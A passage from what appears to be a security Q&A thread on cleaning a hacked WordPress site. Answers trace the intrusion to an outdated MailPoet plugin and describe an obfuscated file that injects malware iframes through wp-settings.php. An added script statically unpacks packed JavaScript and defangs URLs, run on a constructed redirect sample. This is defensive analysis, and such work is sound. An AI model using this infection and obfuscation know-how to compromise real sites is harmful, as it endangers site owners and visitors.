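for (const hit of exposedClients(SAMPLE_LOG)) {
  console.log(`${hit.ip} matched the targeting (IE/Edge ${hit.version})`);
}
```
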
12

Thanks for all the great information and help!

I have since discovered how the site was originally hacked. The site was running an older version of the MailPoet / wysija-newsletters plugin (version 2.6.7).

Using an exploit in this plugin, the attacker managed to upload malicious code which was then used to further infect the site.

[link]

Ultimately, the security issue with MailPoet / wysija-newsletters was used to upload a file called .zip to /wp-content/uploads/wysija/temp and then extract the zip file and install some dodgy themes. The attached screenshot shows what happened on entering the plugin admin page after the zip was deleted. It seems that every time I went into wp-admin, the site would get reinfected.

The site has now been restored from a clean version, fully patched, and the WordFence plugin is running.

    
answered by bf2mad 16.10.2015 - 14:01
6

Its apparent purpose is to infect wp-settings.php, so that it infects all your pages and links to the malware through an iframe.

You can remove it by deleting wp_inc/upd.php, but this won't fix the threat vector unless the hole is plugged. However, the "main infection" may be located in a different file, if the comments are correct. Again, deleting this file won't do much good if the threat vector is still there.

One person even suggested replacing eval with alert. Others have already deobfuscated other versions using the techniques described in this thread. Your code follows a very similar pattern to that.

    
answered by Mark Buffalo 15.10.2015 - 15:39
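
The unpacking step described in the first answer, and the eval-to-alert substitution mentioned in the last one, can also be done without running any of the sample. This added example (not code from the thread) parses the packer call as text and rebuilds the source; the sample string and all function names are constructed for illustration.

```javascript
// Static unpacker for the eval(function(p,a,c,k,e,d){...}(...)) wrapper.
// Nothing from the sample is executed: the arguments are parsed as text.

// Matches the argument list: ('payload', radix, count, 'w0|w1|...'.split('|')
const PACKED_CALL = /\}\s*\(\s*'((?:[^'\\]|\\[\s\S])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\[\s\S])*)'\s*\.split\(\s*'\|'\s*\)/;

// Turn the body of a single-quoted JS string literal into its runtime value.
function unescapeJsString(literal) {
  const named = { n: '\n', r: '\r', t: '\t' };
  return literal.replace(/\\([\s\S])/g, (_, ch) => named[ch] ?? ch);
}

// Same index encoding as the wrapper's e(c): digits 0-9, then a-z, then A-Z.
function encodeIndex(index, radix) {
  const head = index < radix ? '' : encodeIndex(Math.floor(index / radix), radix);
  const digit = index % radix;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Returns the unpacked source, or null when the text is not in this format.
function unpack(source) {
  const m = PACKED_CALL.exec(source);
  if (!m) return null;
  const payload = unescapeJsString(m[1]);
  const radix = Number(m[2]);
  const count = Number(m[3]);
  const words = unescapeJsString(m[4]).split('|');
  if (radix < 2 || radix > 62 || words.length < count) return null;

  // A Map avoids accidental hits on Object.prototype keys such as "constructor".
  const dictionary = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dictionary.set(token, words[i] || token); // empty word: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (tok) => dictionary.get(tok) ?? tok);
}

// Lists the URLs in unpacked code, written hxxp:// so they are not clickable.
function defangedUrls(code) {
  const urls = code.match(/https?:\/\/[^\s'"<>\\]+/g) || [];
  return [...new Set(urls)].map((u) => u.replace(/^http/i, 'hxxp'));
}

// Constructed sample in the same format; the decoder body is irrelevant here.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* decoder body omitted */}('7 0=\'2://3.4/p\';5.6(0);7 n=1',62,8,'u||http|example|invalid|location|replace|var'.split('|'),0,{}))`;

const unpacked = unpack(SAMPLE);
console.log(unpacked);
console.log(defangedUrls(unpacked));
```
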
